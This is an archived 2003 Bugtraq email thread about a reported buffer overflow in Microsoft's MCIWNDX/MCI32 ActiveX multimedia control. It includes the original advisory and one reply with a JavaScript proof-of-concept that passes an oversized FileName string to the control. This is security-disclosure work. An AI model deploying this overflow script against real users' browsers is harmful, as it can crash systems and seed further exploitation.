lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 13 Aug 2003 15:09:48 -0400
From: "Oliver Lavery" <oliver.lavery@...patico.ca>
To: "'Drew Copley'" <dcopley@...e.com>, <bugtraq@...urityfocus.com>,
	<trihuynh@...up.com>
Subject: RE: Microsoft MCWNDX.OCX ActiveX buffer overflow


Hi Drew,

	Long time no speak. Blink coming along?

	MCI32.ocx is marked safe for initialization, so an attack is still
possible. Doesn't seem like the filename argument suffers from an overflow
tho'.

	Perhaps you could try this on 2k and see if this really is just a
red herring:

<script>

 buf = "A";

 // doubling (this is a HUGE buffer, and swamps IE for a while)
 for (i = 0; i < 24; i++) buf += buf;

 wnd=open("about:blank","",""); 
// wnd.moveTo(screen.Width,screen.Height);
 WndDoc=wnd.document;
 WndDoc.open();
 WndDoc.clear();

 WndDoc.write('<HTML><BODY>');
 WndDoc.write('<OBJECT ID="MCIWnd"');
 WndDoc.write('        WIDTH=400 HEIGHT=300');
 WndDoc.write('
CLASSID="CLSID:C1A8AF25-1257-101B-8FB0-0020AF039CA3">');
 WndDoc.write('     <PARAM name="FileName" VALUE="' + buf +'">');
 WndDoc.write('</OBJECT>');
 WndDoc.write('</BODY>');
 WndDoc.write('</HTML>');

</script>

Cheers,
~ol




> -----Original Message-----
> From: Drew Copley [mailto:dcopley@...e.com] 
> Sent: August 13, 2003 2:44 PM
> To: 'xenophi1e'; bugtraq@...urityfocus.com; trihuynh@...up.com
> Subject: RE: Microsoft MCWNDX.OCX ActiveX buffer overflow
> 
> 
> 
> I find no "MCWNDX.ocx" on my system nor on google. It may be 
> a Windows locality issue. Microsoft Multimedia Control fits 
> the description, though, as you noted. It does have a 
> "FileName" method and uses the .mci filetype, but on Windows 
> 2000 it is not a safe activex control for scripting on 
> webpages in the Internet Zone.
> 
> 
> > -----Original Message-----
> > From: xenophi1e [mailto:oliver.lavery@...patico.ca]
> > Sent: Wednesday, August 13, 2003 10:51 AM
> > To: bugtraq@...urityfocus.com
> > Subject: Re: Microsoft MCWNDX.OCX ActiveX buffer overflow
> > 
> > 
> > In-Reply-To: <007201c361df$c311f0c0$329f8018@...ru10ixi0anw>
> > 
> > 
> > 
> > Does anyone know what the guid for this control is? I don't
> > have it on XP 
> > 
> > with Visual Studio 6 installed.
> > 
> > 
> > 
> > Could this be the same as the Microsoft Multimedia Control, aka
> > 
> > MCI32.OCX?
> > 
> > 
> > 
> > Cheers,
> > 
> > ~ol
> > 
> > 
> > 
> > > Microsoft MCWNDX.OCX ActiveX buffer overflow
> > 
> > > =================================================
> > 
> > >
> > 
> > > PROGRAM: MICROSOFT MCIWNDX.OCX ACTIVEX BUFFER OVERFLOW
> > 
> > >HOMEPAGE:  www.microsoft.com
> > 
> > >VULNERABLE VERSIONS: MCWNDX is an ActiveX shipped with
> > Visual Studio 6
> > >to
> > 
> > >support multimedia programming.
> > 
> > >
> > 
> > > DESCRIPTION
> > 
> > > =================================================
> > 
> > >
> > 
> > > MCWNDX is an activeX shipped with Visual Studio 6 to
> > 
> > >support multimedia programming. Although not many people use it
> > >anymore,
> > 
> > >however it still can be called through CLSID in a website
> > and passing a
> > 
> > >large amount of data to the activex will cause an buffer overflow.
> > 
> > >
> > 
> > >Since this Activex is only shipped with VIsual Studio 6.0, so only
> > 
> > >people who are having Visual Studio 6.0 will be affected or people
> > 
> > >who are still using old multimedia programs coded in Visual
> > Studio 6.0
> > 
> > >(In my PC, the last date the ActiveX is patched is in 1996 !
> > I am using
> > 
> > >VS Sp 4)
> > 
> > >
> > 
> > >
> > 
> > > DETAILS
> > 
> > > =================================================
> > 
> > > The ActiveX has a property called "Filename" which is used
> > to specify
> > 
> > >the .mci file to load. However if it is passed with a very large
> > 
> > >string(640KB
> > 
> > >is good enough :-) ), it will cause a bufferoverflow. (I can't
> > >overwrite
> > 
> > the
> > 
> > >EIP using this overflow in my XP, however it doesn't mean 
> the problem
> > 
> > can't
> > 
> > >be exploited)
> > 
> > >
> > 
> > >Microsoft has been noticed but since the hole is maybe minor
> > to them so
> > 
> > >they don't response to me even a short sentence like "Thank you !"
> > 
> > >
> > 
> > >
> > 
> > >
> > 
> > > WORKAROUND
> > 
> > > =================================================
> > 
> > >
> > 
> > > Delete the file MCWNDX.ocx in your SYSTEM32 directory if you are
> > 
> > >using 2000 or XP or in your SYSTEM directory if you are
> > using WIN ME or
> > 
> > >below
> > 
> > >
> > 
> > >
> > 
> > >CREDITS
> > 
> > > =================================================
> > 
> > >
> > 
> > > Discovered by Tri Huynh from Sentry Union
> > 
> > >
> > 
> > >
> > 
> > > DISLAIMER
> > 
> > > =================================================
> > 
> > >
> > 
> > > The information within this paper may change without 
> notice. Use of
> > 
> > > this information constitutes acceptance for use in an AS IS
> > condition.
> > 
> > > There are NO warranties with regard to this information. 
> In no event
> > 
> > > shall the author be liable for any damages whatsoever 
> arising out of
> > 
> > > or in connection with the use or spread of this 
> information. Any use
> > 
> > > of this information is at the user's own risk.
> > 
> > >
> > 
> > >
> > 
> > > FEEDBACK
> > 
> > > =================================================
> > 
> > >
> > 
> > > Please send suggestions, updates, and comments to:
> > trihuynh@...up.com
> > 
> > >
> > 
> > >
> > 
> > >
> > 
> > 
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ